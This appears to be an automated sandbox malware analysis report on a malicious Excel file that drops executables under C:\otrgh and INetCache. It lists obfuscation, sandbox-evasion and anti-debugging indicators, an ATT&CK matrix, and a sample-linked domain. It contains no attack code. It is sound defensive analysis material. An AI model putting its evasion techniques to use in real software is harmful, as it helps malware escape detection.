Source:	Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7 source: 9ght3erd[1].exe.0.dr
Source:	Binary string: ole32.pdb source: fdcbn.exe, 00000001.00000002.258877953.0000023607860000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508687761.000001DEF2290000.00000002.00000001.sdmp
Source:	Binary string: advapi32.pdb source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
Source:	Binary string: shell32.pdb source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: user32.pdb source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
Source:	Binary string: crypt32.pdbUGP source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp
Source:	Binary string: advapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251973477.0000023606110000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.503853339.000001DEF0D10000.00000002.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
Source:	Binary string: netapi32.pdb source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: fdcbn.exe, 00000001.00000002.251576617.0000023605D80000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501200537.000001DEF07C0000.00000002.00000001.sdmp
Source:	Binary string: netapi32.pdbUGP source: fdcbn.exe, 00000001.00000002.251960756.00000236060F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502506717.000001DEF0B10000.00000002.00000001.sdmp
Source:	Binary string: kernel32.pdb source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
Source:	Binary string: user32.pdbUGP source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp
Source:	Binary string: wininet.pdbUGP source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
Source:	Binary string: ws2_32.pdbUGP source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
Source:	Binary string: bcrypt.pdbUGP source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
Source:	Binary string: shell32.pdbUGP source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp
Source:	Binary string: crypt32.pdb source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp

Data Obfuscation:

Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BD98E pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BC349 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BED4B pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B2318 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B452F pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B3A07 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BE607 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B23E1 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BE1E1 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B4FBB pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B21D0 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B71D4 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B3B97 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B219C pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BE47B pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BC68F pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B705F pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B4267 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BC44D pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B7219 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BDA1E pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B242F pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B20DE pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B6EC1 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B70BB pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B3CD1 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B3ACD pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645BDC9A pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B4298 pushfq ; ret
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF7645B26B0 pushfq ; ret

Persistence and Installation Behavior:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\msdownld.tmp\AS01A87F.tmp\victory.php	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\otrgh\sdgvjk\fdcbn.exe	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\msdownld.tmp\AS01A87F.tmp\victory.php

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\otrgh\sdgvjk\fdcbn.exe

Thread delayed: delay time: 180000

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Dropped PE file which has not been started: C:\otrgh\sdgvjk\fdcbn.exe			Jump to dropped file

Source: C:\otrgh\sdgvjk\fdcbn.exe

API coverage: 8.9 %

Source: C:\otrgh\sdgvjk\fdcbn.exe TID: 5328

Thread sleep time: -180000s >= -30000s

Source: C:\otrgh\sdgvjk\fdcbn.exe

Last function: Thread delayed

Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW0
Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Anti Debugging:

Source: C:\otrgh\sdgvjk\fdcbn.exe

Code function: 1_2_00007FF764607818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\otrgh\sdgvjk\fdcbn.exe

Code function: 1_2_00007FF7645B8800 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,

Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF764603204 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\otrgh\sdgvjk\fdcbn.exe	Code function: 1_2_00007FF764607818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Source: C:\otrgh\sdgvjk\fdcbn.exe

Process created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'

Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: InitialExpandWindows.HistoryVaultRestoreWindows.closewindowWindows.menubarWindows.selectModeWindows.invertselectionWindows.selectnoneWindows.selectallWindows.pastelinkWindows.pasteWindows.includeinlibraryWindows.burnWindows.emailWindows.newfolderrenamerenamepastelinkpastelinkpropertiespropertieslinklinkpastepastecopycopycutcutdeletedeletemswindowsvideomswindowsmusicmailtohttpshttpbingmaps.zpl.xvid.WPL.wmv.wma.wm.wdp.wav.TTS.TS.rwl.rw2.raw.raf.png.pef.pdf.orf.nrw.nef.mts.mpv2.mpa.mp4v.mp4.mp3.mrw.mov.mod.mkv.m4v.m4r.m4a.m3u.m2ts.m2t.kdc.jxr.jpeg.jpe.jfif.html.htm.gif.flac.erf.epub.dib.crw.cr2.bmp.avi.arw.amr.adts.adt.aac.3gpp.3gp.3g2shcond://v2#ControlPanelExistsshcond://v1#AreAppDefaultsRestrictedshcond://v1#IsIrDASupportedshcond://v1#IsMobilityCenterEnabledshcond://v1#IsParentalControlsAvailableshcond://v1#IsProximityProviderAvailableshcond://v1#COMConditionshcond://v2#IsRemoteDesktopshcond://v2#IsProjectionAvailableshcond://v1#IsAuxDisplayConnectedAndAutoWakeEnabledshcond://v1#IsMuiEnabledshcond://v1#IsGlassOnshcond://v1#IsConnectedToInternetshcond://v1#IsTouchAvailableshcond://v1#IsPenAvailableshcond://v1#IsTabletPCshcond://v1#IsServershcond://v1#SkuEqualsshcond://v1#IsOfflineFilesEnabledshcond://v1#IsBrightnessAvailableshcond://v1#IsPresentationSettingsEnabledshcond://v1#IsMobilePCshcond://v1#IsAuxDisplayConnectedshcond://v1#IsUserAdminshcond://v1#IsMachineNotOnDomainAndDomainIsAvailshcond://v1#IsMachineOnDomainshcond://v1#RegkeyExistsshcond://v1#RegvalExistsshcond://v1#RegvalEqualsRateChartOverlayWindowAutoplayHandlerChooserOperationStatusWindowMenuSiteBaseBarExplorerBrowserControlExplorerBrowserNavigationDateRangeControlBooleanCheckMarkControlIconListControlmsctls_netaddressSysDragImageThumbnailControlPropertyControlBaseShell Preview Extension Temporary ParentShell Preview Extension Host PreviewerShell Preview Extension Host Background MsgCalendarHostDropDownRatingsControlSHELLDLL_MVPEditControlViewControlClassTrackContextMenuClassSharePointViewUserEventWindowGroupButtonShellFileSearchControlATL Shell EmbeddingDivWindowMSGlobalFolderOptionsStubProgmanStubWindow32cpShowColorcpColorWOACnslFontPreviewWOACnslWinPreview\Sharepoint\Dropbox\Google Drive\Onedrive -\3D Objects\Music\Videos\Pictures\Pictures\Camera Roll\Documents\Downloads\DesktopParse Internet Dont Escape SpacesDon't Parse RelativePendingRedirectionSyncRootsUserSyncRoots
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: VerticalScrollBaranimationTileContentsSrcanimationProgressSrcInneranimationProgressDstanimationProgressDstInneranimationTileContentsDstanimationTileContentsSrcInneranimationTileContentsDstInneranimationProgressSrcidOperationTileeltProgressBareltInterruptPaneeltSummaryeltRegularTileHeadereltInterruptDoForAlleltInterruptButtonsContainereltInterruptDescriptioneltItemIconeltInterruptSkipBtneltInterruptCancelBtneltInterruptRetryBtneltInterruptYesBtneltItemNameeltItemPropseltInterruptElevateBtneltInterruptDeleteBtneltInterruptDoForAllLabelidOperationInterruptidTileSubTextshell\shell32\operationstatusmgr.cppeltInterruptOKBtneltInterruptNoBtnConfirmationCheckBoxDoForAllidTileActionIdTileKeepDestIdTileKeepAsWorkIdTileKeepAsPersonalIdTileIgnoreIdTileDecideForEachidItemTileIdTileKeepSourceidTileIconeltConflictInterruptDescriptioneltItemTileContainerKeepSourceTileIconSkipTileIconDecideForEachTileIconCustomCommandIconidConflictInterrupteltInterruptTileHeaderidCustomConflictInterrupteltTimeRemainingeltTile%ueltTileContentseltPauseButtonIdTileDefault%0.2fCHARTVIEWeltRateCharteltCancelButtoneltRegularTileeltScrolleltDetailseltItemsRemainingeltLocationseltConfirmationInterrupteltConflictInterrupteltDisplayModeBtneltDisplayModeBtnFocusHoldereltTileAreaeltProgressBarContainereltDividereltScrollBarFilleridTileHosteltFooterAreaprogmanEnthusiastModeWindows.SystemToast.ExplorerRICHEDIT50WlfItaliclfUnderlinelfStrikeOutlfCharSetSoftware\Microsoft\NotepadlfEscapementlfOrientationlfWeightiPointSizeLucida ConsolelfFaceNamelfOutPrecisionlfClipPrecisionlfQualitylfPitchAndFamily
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: Local\SM0:%d:%d:%hsShell_TrayWnd_p0hCLSID\Software\Classes\RtlDllShutdownInProgressEtwEventWriteEtwEventEnabledEtwEventUnregisterEtwEventRegisterntdll.dllWilStaging_02NtQuerySystemInformationSecurity-SPP-Reserved-TBLProductKeyTypeshell32-license-ShowProductNameOnDesktopSoftware\Microsoft\Windows NT\CurrentVersion\WindowsDisplayVersionBasebrdWldpCheckRetailConfiguration\Registry\Machine\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3\Registry\Machine\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\2BD63D28D7BCD0E251195AEB519243C13142EBC3BuildLabYOr
Source: fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: PROGMANDDEMLMom%c:\%sExplorerDMGFrameGetWorkingDirGetDescriptionProgmanProgmanGetIconsetupPmFrameSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsFoldersGroupsAppPropertiesBWWFrameccInsDDEBACKSCAPEDDEClientWndClassDDEClientStartUpddeClassInstallCA_DDECLASSMake Program Manager GroupMedia RecorderMediaRecorderSender#32770groups
Source: fdcbn.exe, 00000003.00000002.500567052.000001DEEF1D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: ConfirmCabinetIDExploreFolderShellFileOpenFindFileViewFolderCreateGroupReplaceItemDeleteItemFindFolderReloadAddItemShowGroupDeleteGroupExitProgman
Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmp	Binary or memory string: CountryL1WUSF123r5.inidriverRestartCommandsSoftware\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup/LOADSAVEDWINDOWSNonRudeHWNDDesktopWindowAutoColorizationProgram ManagerpszDesktopTitleWLocal\Microsoft-Windows-DesktopBackground
Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.502621730.000001DEF0B30000.00000002.00000001.sdmp	Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

Source: C:\otrgh\sdgvjk\fdcbn.exe

Code function: 1_2_00007FF7646038CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Scripting11	Path Interception	Process Injection12	Masquerading11	Input Capture11	System Time Discovery1	Replication Through Removable Media1	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution43	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Security Software Discovery21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting11	LSA Secrets	Peripheral Device Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
japort.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3.crl0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://ocsp.suscerte.gob.ve0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
